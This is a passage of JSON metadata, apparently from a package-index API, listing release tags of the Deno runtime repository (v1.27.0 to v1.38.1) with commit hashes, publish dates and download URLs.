ries/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecos